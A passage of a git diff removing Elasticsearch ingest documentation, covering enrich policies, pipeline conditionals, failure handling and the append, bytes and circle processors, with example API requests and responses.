for the policy. - -[source,console] ----- -POST /_enrich/policy/postal_policy/_execute ----- -// TEST[continued] - -Use the <> to create an ingest pipeline. In -the pipeline, add an <> that includes: - -* Your enrich policy. -* The `field` of incoming documents used to match the geo_shape of documents - from the enrich index. -* The `target_field` used to store appended enrich data for incoming documents. - This field contains the `match_field` and `enrich_fields` specified in your - enrich policy. -* The `shape_relation`, which indicates how the processor matches geo_shapes in - incoming documents to geo_shapes in documents from the enrich index. See - <<_spatial_relations>> for valid options and more information. 
- -[source,console] ----- -PUT /_ingest/pipeline/postal_lookup -{ - "description": "Enrich postal codes", - "processors": [ - { - "enrich": { - "policy_name": "postal_policy", - "field": "geo_location", - "target_field": "geo_data", - "shape_relation": "INTERSECTS" - } - } - ] -} ----- -// TEST[continued] - -Use the ingest pipeline to index a document. The incoming document should -include the `field` specified in your enrich processor. - -[source,console] ----- -PUT /users/_doc/0?pipeline=postal_lookup -{ - "first_name": "Mardy", - "last_name": "Brown", - "geo_location": "POINT (13.5 52.5)" -} ----- -// TEST[continued] - -To verify the enrich processor matched and appended the appropriate field data, -use the <> to view the indexed document. - -[source,console] ----- -GET /users/_doc/0 ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "found": true, - "_index": "users", - "_type": "_doc", - "_id": "0", - "_version": 1, - "_seq_no": 55, - "_primary_term": 1, - "_source": { - "geo_data": { - "location": { - "type": "envelope", - "coordinates": [[13.0, 53.0], [14.0, 52.0]] - }, - "postal_code": "96598" - }, - "first_name": "Mardy", - "last_name": "Brown", - "geo_location": "POINT (13.5 52.5)" - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/postal_lookup -DELETE /_enrich/policy/postal_policy --------------------------------------------------- -// TEST[continued] -//// - -[role="xpack"] -[testenv="basic"] -[[match-enrich-policy-type]] -=== Example: Enrich your data based on exact values - -`match` <> match enrich data to incoming -documents based on an exact value, such as a email address or ID, using a -<>. - -The following example creates a `match` enrich policy that adds user name and -contact information to incoming documents based on an email address. It then -adds the `match` enrich policy to a processor in an ingest pipeline. - -Use the <> or <> to create a source index. - -The following index API request creates a source index and indexes a -new document to that index. - -[source,console] ----- -PUT /users/_doc/1?refresh=wait_for -{ - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "city": "New Orleans", - "county": "Orleans", - "state": "LA", - "zip": 70116, - "web": "mardy.asciidocsmith.com" -} ----- - -Use the put enrich policy API to create an enrich policy with the `match` -policy type. This policy must include: - -* One or more source indices -* A `match_field`, - the field from the source indices used to match incoming documents -* Enrich fields from the source indices you'd like to append to incoming - documents - -[source,console] ----- -PUT /_enrich/policy/users-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TEST[continued] - -Use the <> to create an -enrich index for the policy. - -[source,console] ----- -POST /_enrich/policy/users-policy/_execute ----- -// TEST[continued] - - -Use the <> to create an ingest pipeline. In -the pipeline, add an <> that includes: - -* Your enrich policy. -* The `field` of incoming documents used to match documents - from the enrich index. -* The `target_field` used to store appended enrich data for incoming documents. 
- This field contains the `match_field` and `enrich_fields` specified in your - enrich policy. - -[source,console] ----- -PUT /_ingest/pipeline/user_lookup -{ - "description" : "Enriching user details to messages", - "processors" : [ - { - "enrich" : { - "policy_name": "users-policy", - "field" : "email", - "target_field": "user", - "max_matches": "1" - } - } - ] -} ----- -// TEST[continued] - -Use the ingest pipeline to index a document. The incoming document should -include the `field` specified in your enrich processor. - -[source,console] ----- -PUT /my-index-00001/_doc/my_id?pipeline=user_lookup -{ - "email": "mardy.brown@asciidocsmith.com" -} ----- -// TEST[continued] - -To verify the enrich processor matched and appended the appropriate field data, -use the <> to view the indexed document. - -[source,console] ----- -GET /my-index-00001/_doc/my_id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "found": true, - "_index": "my-index-00001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 55, - "_primary_term": 1, - "_source": { - "user": { - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "zip": 70116, - "city": "New Orleans", - "state": "LA" - }, - "email": "mardy.brown@asciidocsmith.com" - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/user_lookup -DELETE /_enrich/policy/users-policy --------------------------------------------------- -// TEST[continued] -//// diff --git a/docs/reference/ingest/ingest-node.asciidoc b/docs/reference/ingest/ingest-node.asciidoc deleted file mode 100644 index bbaed48b21e..00000000000 --- a/docs/reference/ingest/ingest-node.asciidoc +++ /dev/null @@ -1,908 +0,0 @@ -[[pipeline]] -== Pipeline Definition - -A pipeline is a definition of a series of <> that are to be executed -in the same order as they are declared. A pipeline consists of two main fields: a `description` -and a list of `processors`: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ ... ] -} --------------------------------------------------- -// NOTCONSOLE - -The `description` is a special field to store a helpful description of -what the pipeline does. - -The `processors` parameter defines a list of processors to be executed in -order. - -[[accessing-data-in-pipelines]] -== Accessing Data in Pipelines - -The processors in a pipeline have read and write access to documents that pass through the pipeline. -The processors can access fields in the source of a document and the document's metadata fields. - -[discrete] -[[accessing-source-fields]] -=== Accessing Fields in the Source -Accessing a field in the source is straightforward. You simply refer to fields by -their name. 
For example: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "my_field", - "value": 582.1 - } -} --------------------------------------------------- -// NOTCONSOLE - -On top of this, fields from the source are always accessible via the `_source` prefix: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_source.my_field", - "value": 582.1 - } -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[accessing-metadata-fields]] -=== Accessing Metadata Fields -You can access metadata fields in the same way that you access fields in the source. This -is possible because Elasticsearch doesn't allow fields in the source that have the -same name as metadata fields. - -The following metadata fields are accessible by a processor: - -* `_index` -* `_type` -* `_id` -* `_routing` - -The following example sets the `_id` metadata field of a document to `1`: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_id", - "value": "1" - } -} --------------------------------------------------- -// NOTCONSOLE - -You can access a metadata field's value by surrounding it in double -curly brackets `"{{ }}"`. For example, `{{_index}}` retrieves the name of a -document's index. - -WARNING: If you <> -document IDs, you cannot use the `{{_id}}` value in an ingest processor. {es} -assigns auto-generated `_id` values after ingest. - -[discrete] -[[accessing-ingest-metadata]] -=== Accessing Ingest Metadata Fields -Beyond metadata fields and source fields, ingest also adds ingest metadata to the documents that it processes. -These metadata properties are accessible under the `_ingest` key. Currently ingest adds the ingest timestamp -under the `_ingest.timestamp` key of the ingest metadata. The ingest timestamp is the time when Elasticsearch -received the index or bulk request to pre-process the document. - -Any processor can add ingest-related metadata during document processing. Ingest metadata is transient -and is lost after a document has been processed by the pipeline. Therefore, ingest metadata won't be indexed. - -The following example adds a field with the name `received`. The value is the ingest timestamp: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "received", - "value": "{{_ingest.timestamp}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -Unlike Elasticsearch metadata fields, the ingest metadata field name `_ingest` can be used as a valid field name -in the source of a document. Use `_source._ingest` to refer to the field in the source document. Otherwise, `_ingest` -will be interpreted as an ingest metadata field. - -[discrete] -[[accessing-template-fields]] -=== Accessing Fields and Metafields in Templates -A number of processor settings also support templating. Settings that support templating can have zero or more -template snippets. A template snippet begins with `{{` and ends with `}}`. -Accessing fields and metafields in templates is exactly the same as via regular processor field settings. - -The following example adds a field named `field_c`. Its value is a concatenation of -the values of `field_a` and `field_b`. 
- -[source,js] --------------------------------------------------- -{ - "set": { - "field": "field_c", - "value": "{{field_a}} {{field_b}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -The following example uses the value of the `geoip.country_iso_code` field in the source -to set the index that the document will be indexed into: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_index", - "value": "{{geoip.country_iso_code}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -Dynamic field names are also supported. This example sets the field named after the -value of `service` to the value of the field `code`: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "{{service}}", - "value": "{{code}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[ingest-conditionals]] -== Conditional Execution in Pipelines - -Each processor allows for an optional `if` condition to determine if that -processor should be executed or skipped. The value of the `if` is a -<> script that needs to evaluate -to `true` or `false`. - -For example the following processor will <> the document -(i.e. not index it) if the input document has a field named `network_name` -and it is equal to `Guest`. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "drop": { - "if": "ctx.network_name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -Using that pipeline for an index request: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=drop_guests_network -{ - "network_name" : "Guest" -} --------------------------------------------------- -// TEST[continued] - -Results in nothing indexed since the conditional evaluated to `true`. - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": -3, - "result": "noop", - "_shards": { - "total": 0, - "successful": 0, - "failed": 0 - } -} --------------------------------------------------- - - -[[ingest-conditional-nullcheck]] -=== Handling Nested Fields in Conditionals - -Source documents often contain nested fields. Care should be taken -to avoid NullPointerExceptions if the parent object does not exist -in the document. For example `ctx.a.b.c` can throw an NullPointerExceptions -if the source document does not have top level `a` object, or a second -level `b` object. - -To help protect against NullPointerExceptions, null safe operations should be used. -Fortunately, Painless makes {painless}/painless-operators-reference.html#null-safe-operator[null safe] -operations easy with the `?.` operator. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "drop": { - "if": "ctx.network?.name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -The following document will get <> correctly: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=drop_guests_network -{ - "network": { - "name": "Guest" - } -} --------------------------------------------------- -// TEST[continued] - -Thanks to the `?.` operator the following document will not throw an error. 
-If the pipeline used a `.` the following document would throw a NullPointerException -since the `network` object is not part of the source document. - -[source,console] --------------------------------------------------- -POST test/_doc/2?pipeline=drop_guests_network -{ - "foo" : "bar" -} --------------------------------------------------- -// TEST[continued] - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/2 --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "found": true, - "_source": { - "foo": "bar" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] -//// - -The source document can also use dot delimited fields to represent nested fields. - -For example instead the source document defining the fields nested: - -[source,js] --------------------------------------------------- -{ - "network": { - "name": "Guest" - } -} --------------------------------------------------- -// NOTCONSOLE - -The source document may have the nested fields flattened as such: -[source,js] --------------------------------------------------- -{ - "network.name": "Guest" -} --------------------------------------------------- -// NOTCONSOLE - -If this is the case, use the <> -so that the nested fields may be used in a conditional. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "dot_expander": { - "field": "network.name" - } - }, - { - "drop": { - "if": "ctx.network?.name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -Now the following input document can be used with a conditional in the pipeline. - -[source,console] --------------------------------------------------- -POST test/_doc/3?pipeline=drop_guests_network -{ - "network.name": "Guest" -} --------------------------------------------------- -// TEST[continued] - -The `?.` operators works well for use in the `if` conditional -because the {painless}/painless-operators-reference.html#null-safe-operator[null safe operator] -returns null if the object is null and `==` is null safe (as well as many other -{painless}/painless-operators.html[painless operators]). - -However, calling a method such as `.equalsIgnoreCase` is not null safe -and can result in a NullPointerException. - -Some situations allow for the same functionality but done so in a null safe manner. -For example: `'Guest'.equalsIgnoreCase(ctx.network?.name)` is null safe because -`Guest` is always non null, but `ctx.network?.name.equalsIgnoreCase('Guest')` is not null safe -since `ctx.network?.name` can return null. - -Some situations require an explicit null check. In the following example there -is not null safe alternative, so an explicit null check is needed. - -[source,js] --------------------------------------------------- -{ - "drop": { - "if": "ctx.network?.name != null && ctx.network.name.contains('Guest')" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[ingest-conditional-complex]] -=== Complex Conditionals -The `if` condition can be more complex than a simple equality check. 
-The full power of the <> is available and -running in the {painless}/painless-ingest-processor-context.html[ingest processor context]. - -IMPORTANT: The value of ctx is read-only in `if` conditions. - -A more complex `if` condition that drops the document (i.e. not index it) -unless it has a multi-valued tag field with at least one value that contains the characters -`prod` (case insensitive). - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": "Collection tags = ctx.tags;if(tags != null){for (String tag : tags) {if (tag.toLowerCase().contains('prod')) { return false;}}} return true;" - } - } - ] -} --------------------------------------------------- - -The conditional needs to be all on one line since JSON does not -support new line characters. However, Kibana's console supports -a triple quote syntax to help with writing and debugging -scripts like these. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": """ - Collection tags = ctx.tags; - if(tags != null){ - for (String tag : tags) { - if (tag.toLowerCase().contains('prod')) { - return false; - } - } - } - return true; - """ - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -or it can be built with a stored script: - -[source,console] --------------------------------------------------- -PUT _scripts/not_prod -{ - "script": { - "lang": "painless", - "source": """ - Collection tags = ctx.tags; - if(tags != null){ - for (String tag : tags) { - if (tag.toLowerCase().contains('prod')) { - return false; - } - } - } - return true; - """ - } -} -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": { "id": "not_prod" } - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -Either way, you can run it with: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=not_prod_dropper -{ - "tags": ["application:myapp", "env:Stage"] -} --------------------------------------------------- -// TEST[continued] - -The document is <> since `prod` (case insensitive) -is not found in the tags. - -The following document is indexed (i.e. not dropped) since -`prod` (case insensitive) is found in the tags. - -[source,console] --------------------------------------------------- -POST test/_doc/2?pipeline=not_prod_dropper -{ - "tags": ["application:myapp", "env:Production"] -} --------------------------------------------------- -// TEST[continued] - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/2 --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 34, - "_primary_term": 1, - "found": true, - "_source": { - "tags": [ - "application:myapp", - "env:Production" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] -//// - - - -The <> with verbose can be used to help build out -complex conditionals. If the conditional evaluates to false it will be -omitted from the verbose results of the simulation since the document will not change. 
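For example, a sketch of how you might exercise the `not_prod_dropper` pipeline defined above; the document values below are illustrative:

[source,console]
----
POST /_ingest/pipeline/not_prod_dropper/_simulate?verbose=true
{
  "docs": [
    {
      "_source": {
        "tags": [ "application:myapp", "env:Production" ]
      }
    }
  ]
}
----

Because this document carries a `prod` tag, the conditional evaluates to false and the `drop` processor is omitted from the verbose results; swap in a document without a `prod` tag to see the processor take effect.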
- -Care should be taken to avoid overly complex or expensive conditional checks -since the condition needs to be checked for each and every document. - -[[conditionals-with-multiple-pipelines]] -=== Conditionals with the Pipeline Processor -The combination of the `if` conditional and the <> can result in a simple, -yet powerful means to process heterogeneous input. For example, you can define a single pipeline -that delegates to other pipelines based on some criteria. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/logs_pipeline -{ - "description": "A pipeline of pipelines for log files", - "version": 1, - "processors": [ - { - "pipeline": { - "if": "ctx.service?.name == 'apache_httpd'", - "name": "httpd_pipeline" - } - }, - { - "pipeline": { - "if": "ctx.service?.name == 'syslog'", - "name": "syslog_pipeline" - } - }, - { - "fail": { - "if": "ctx.service?.name != 'apache_httpd' && ctx.service?.name != 'syslog'", - "message": "This pipeline requires service.name to be either `syslog` or `apache_httpd`" - } - } - ] -} --------------------------------------------------- - -The above example allows consumers to point to a single pipeline for all log based index requests. -Based on the conditional, the correct pipeline will be called to process that type of data. - -This pattern works well with a <> defined in an index mapping -template for all indexes that hold data that needs pre-index processing. - -[[conditionals-with-regex]] -=== Conditionals with the Regular Expressions -The `if` conditional is implemented as a Painless script, which requires -{painless}//painless-regexes.html[explicit support for regular expressions]. - -`script.painless.regex.enabled: true` must be set in `elasticsearch.yml` to use regular -expressions in the `if` condition. - -If regular expressions are enabled, operators such as `=~` can be used against a `/pattern/` for conditions. - -For example: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/check_url -{ - "processors": [ - { - "set": { - "if": "ctx.href?.url =~ /^http[^s]/", - "field": "href.insecure", - "value": true - } - } - ] -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=check_url -{ - "href": { - "url": "http://www.elastic.co/" - } -} --------------------------------------------------- -// TEST[continued] - -Results in: - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/1 --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 60, - "_primary_term": 1, - "found": true, - "_source": { - "href": { - "insecure": true, - "url": "http://www.elastic.co/" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Regular expressions can be expensive and should be avoided if viable -alternatives exist. 
- -For example in this case `startsWith` can be used to get the same result -without using a regular expression: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/check_url -{ - "processors": [ - { - "set": { - "if": "ctx.href?.url != null && ctx.href.url.startsWith('http://')", - "field": "href.insecure", - "value": true - } - } - ] -} --------------------------------------------------- - -[[handling-failure-in-pipelines]] -== Handling Failures in Pipelines - -In its simplest use case, a pipeline defines a list of processors that -are executed sequentially, and processing halts at the first exception. This -behavior may not be desirable when failures are expected. For example, you may have logs -that don't match the specified grok expression. Instead of halting execution, you may -want to index such documents into a separate index. - -To enable this behavior, you can use the `on_failure` parameter. The `on_failure` parameter -defines a list of processors to be executed immediately following the failed processor. -You can specify this parameter at the pipeline level, as well as at the processor -level. If a processor specifies an `on_failure` configuration, whether -it is empty or not, any exceptions that are thrown by the processor are caught, and the -pipeline continues executing the remaining processors. Because you can define further processors -within the scope of an `on_failure` statement, you can nest failure handling. - -The following example defines a pipeline that renames the `foo` field in -the processed document to `bar`. If the document does not contain the `foo` field, the processor -attaches an error message to the document for later analysis within -Elasticsearch. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "target_field" : "bar", - "on_failure" : [ - { - "set" : { - "field" : "error.message", - "value" : "field \"foo\" does not exist, cannot rename to \"bar\"" - } - } - ] - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The following example defines an `on_failure` block on a whole pipeline to change -the index to which failed documents get sent. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ ... ], - "on_failure" : [ - { - "set" : { - "field" : "_index", - "value" : "failed-{{ _index }}" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -Alternatively instead of defining behaviour in case of processor failure, it is also possible -to ignore a failure and continue with the next processor by specifying the `ignore_failure` setting. - -In case in the example below the field `foo` doesn't exist the failure will be caught and the pipeline -continues to execute, which in this case means that the pipeline does nothing. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "target_field" : "bar", - "ignore_failure" : true - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The `ignore_failure` can be set on any processor and defaults to `false`. 
- -[discrete] -[[accessing-error-metadata]] -=== Accessing Error Metadata From Processors Handling Exceptions - -You may want to retrieve the actual error message that was thrown -by a failed processor. To do so you can access metadata fields called -`on_failure_message`, `on_failure_processor_type`, `on_failure_processor_tag` and -`on_failure_pipeline` (in case an error occurred inside a pipeline processor). -These fields are only accessible from within the context of an `on_failure` block. - -Here is an updated version of the example that you -saw earlier. But instead of setting the error message manually, the example leverages the `on_failure_message` -metadata field to provide the error message. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "to" : "bar", - "on_failure" : [ - { - "set" : { - "field" : "error.message", - "value" : "{{ _ingest.on_failure_message }}" - } - } - ] - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - - -include::enrich.asciidoc[] - - -[[ingest-processors]] -== Processors - -All processors are defined in the following way within a pipeline definition: - -[source,js] --------------------------------------------------- -{ - "PROCESSOR_NAME" : { - ... processor configuration options ... - } -} --------------------------------------------------- -// NOTCONSOLE - -Each processor defines its own configuration parameters, but all processors have -the ability to declare `tag`, `on_failure` and `if` fields. These fields are optional. - -A `tag` is simply a string identifier of the specific instantiation of a certain -processor in a pipeline. The `tag` field does not affect the processor's behavior, -but is very useful for bookkeeping and tracing errors to specific processors. - -The `if` field must contain a script that returns a boolean value. If the script evaluates to `true` -then the processor will be executed for the given document otherwise it will be skipped. -The `if` field takes an object with the script fields defined in <> -and accesses a read only version of the document via the same `ctx` variable used by scripts in the -<>. - -[source,js] --------------------------------------------------- -{ - "set": { - "if": "ctx.foo == 'someValue'", - "field": "found", - "value": true - } -} --------------------------------------------------- -// NOTCONSOLE - -See <> to learn more about the `if` field and conditional execution. - -See <> to learn more about the `on_failure` field and error handling in pipelines. - -The <> will provide a per node list of what processors are available. - -Custom processors must be installed on all nodes. The put pipeline API will fail if a processor specified in a pipeline -doesn't exist on all nodes. If you rely on custom processor plugins make sure to mark these plugins as mandatory by adding -`plugin.mandatory` setting to the `config/elasticsearch.yml` file, for example: - -[source,yaml] --------------------------------------------------- -plugin.mandatory: ingest-attachment --------------------------------------------------- - -A node will not start if this plugin is not available. - -The <> can be used to fetch ingest usage statistics, globally and on a per -pipeline basis. Useful to find out which pipelines are used the most or spent the most time on preprocessing. 
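For example, one way to pull only the ingest statistics out of the node stats response (the `filter_path` value shown here is just an illustration; adjust or omit it as needed):

[source,console]
----
GET /_nodes/stats/ingest?filter_path=nodes.*.ingest
----

Each node's `ingest` object reports total counts and timings, along with a per-pipeline breakdown under `ingest.pipelines`.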
- -[discrete] -=== Ingest Processor Plugins - -Additional ingest processors can be implemented and installed as Elasticsearch {plugins}/intro.html[plugins]. -See {plugins}/ingest.html[Ingest plugins] for information about the available ingest plugins. - -include::processors/append.asciidoc[] -include::processors/bytes.asciidoc[] -include::processors/circle.asciidoc[] -include::processors/convert.asciidoc[] -include::processors/csv.asciidoc[] -include::processors/date.asciidoc[] -include::processors/date-index-name.asciidoc[] -include::processors/dissect.asciidoc[] -include::processors/dot-expand.asciidoc[] -include::processors/drop.asciidoc[] -include::processors/enrich.asciidoc[] -include::processors/fail.asciidoc[] -include::processors/foreach.asciidoc[] -include::processors/geoip.asciidoc[] -include::processors/grok.asciidoc[] -include::processors/gsub.asciidoc[] -include::processors/html_strip.asciidoc[] -include::processors/inference.asciidoc[] -include::processors/join.asciidoc[] -include::processors/json.asciidoc[] -include::processors/kv.asciidoc[] -include::processors/lowercase.asciidoc[] -include::processors/pipeline.asciidoc[] -include::processors/remove.asciidoc[] -include::processors/rename.asciidoc[] -include::processors/script.asciidoc[] -include::processors/set.asciidoc[] -include::processors/set-security-user.asciidoc[] -include::processors/sort.asciidoc[] -include::processors/split.asciidoc[] -include::processors/trim.asciidoc[] -include::processors/uppercase.asciidoc[] -include::processors/url-decode.asciidoc[] -include::processors/user-agent.asciidoc[] diff --git a/docs/reference/ingest/processors/append.asciidoc b/docs/reference/ingest/processors/append.asciidoc deleted file mode 100644 index 839fec7e4ea..00000000000 --- a/docs/reference/ingest/processors/append.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[append-processor]] -=== Append processor -++++ -Append -++++ - - -Appends one or more values to an existing array if the field already exists and it is an array. -Converts a scalar to an array and appends one or more values to it if the field exists and it is a scalar. -Creates an array containing the provided values if the field doesn't exist. -Accepts a single value or an array of values. - -[[append-options]] -.Append Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be appended to. Supports <>. -| `value` | yes | - | The value to be appended. Supports <>. -| `allow_duplicates` | no | true | If `false`, the processor does not append -values already present in the field. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "append": { - "field": "tags", - "value": ["production", "{{app}}", "{{owner}}"] - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/bytes.asciidoc b/docs/reference/ingest/processors/bytes.asciidoc deleted file mode 100644 index 5e8c4c461c1..00000000000 --- a/docs/reference/ingest/processors/bytes.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[bytes-processor]] -=== Bytes processor -++++ -Bytes -++++ - -Converts a human readable byte value (e.g. 1kb) to its value in bytes (e.g. 1024). If the field is an array of strings, all members of the array will be converted. - -Supported human readable units are "b", "kb", "mb", "gb", "tb", "pb" case insensitive. An error will occur if -the field is not a supported format or resultant value exceeds 2^63. 
- -[[bytes-options]] -.Bytes Options -[options="header"] -|====== -| Name | Required | Default  | Description -| `field` | yes | - | The field to convert -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ -  "bytes": { -    "field": "file.size" -  } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/circle.asciidoc b/docs/reference/ingest/processors/circle.asciidoc deleted file mode 100644 index 852e903f041..00000000000 --- a/docs/reference/ingest/processors/circle.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ingest-circle-processor]] -=== Circle processor -++++ -Circle -++++ - -Converts circle definitions of shapes to regular polygons which approximate them. - -[[circle-processor-options]] -.Circle Processor Options -[options="header"] -|====== -| Name | Required | Default  | Description -| `field` | yes | - | The field containing the circle to convert, either a WKT circle string or a GeoJSON circle definition -| `target_field` | no | `field` | The field to assign the polygon shape to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `error_distance` | yes | - | The difference between the resulting inscribed distance from center to side and the circle's radius (measured in meters for `geo_shape`, unit-less for `shape`) -| `shape_type` | yes | - | Which field mapping type is to be used when processing the circle: `geo_shape` or `shape` -include::common-options.asciidoc[] -|====== - - -image:images/spatial/error_distance.png[] - -[source,console] --------------------------------------------------- -PUT circles -{ -  "mappings": { -    "properties": { -      "circle": { -        "type": "geo_shape" -      } -    } -  } -} - -PUT _ingest/pipeline/polygonize_circles -{ -  "description": "translate circle to polygon", -  "processors": [ -    { -      "circle": { -        "field": "circle", -        "error_distance": 28.0, -        "shape_type": "geo_shape" -      } -    } -  ] -} --------------------------------------------------- - -Using the above pipeline, we can attempt to index a document into the `circles` index. -The circle can be represented as either a WKT circle or a GeoJSON circle. The resulting -polygon will be represented and indexed using the same format as the input circle. WKT will -be translated to a WKT polygon, and GeoJSON circles will be translated to GeoJSON polygons.
- -==== Example: Circle defined in Well Known Text - -In this example a circle defined in WKT format is indexed - -[source,console] --------------------------------------------------- -PUT circles/_doc/1?pipeline=polygonize_circles -{ - "circle": "CIRCLE (30 10 40)" -} - -GET circles/_doc/1 --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "circles", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "circle": "POLYGON ((30.000365257263184 10.0, 30.000111397193788 10.00034284530941, 29.999706043744222 10.000213571721195, 29.999706043744222 9.999786428278805, 30.000111397193788 9.99965715469059, 30.000365257263184 10.0))" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -==== Example: Circle defined in GeoJSON - -In this example a circle defined in GeoJSON format is indexed - -[source,console] --------------------------------------------------- -PUT circles/_doc/2?pipeline=polygonize_circles -{ - "circle": { - "type": "circle", - "radius": "40m", - "coordinates": [30, 10] - } -} - -GET circles/_doc/2 --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "circles", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "circle": { - "coordinates": [ - [ - [30.000365257263184, 10.0], - [30.000111397193788, 10.00034284530941], - [29.999706043744222, 10.000213571721195], - [29.999706043744222, 9.999786428278805], - [30.000111397193788, 9.99965715469059], - [30.000365257263184, 10.0] - ] - ], - "type": "Polygon" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -[[circle-processor-notes]] -==== Notes on Accuracy - -Accuracy of the polygon that represents the circle is defined as `error_distance`. The smaller this -difference is, the closer to a perfect circle the 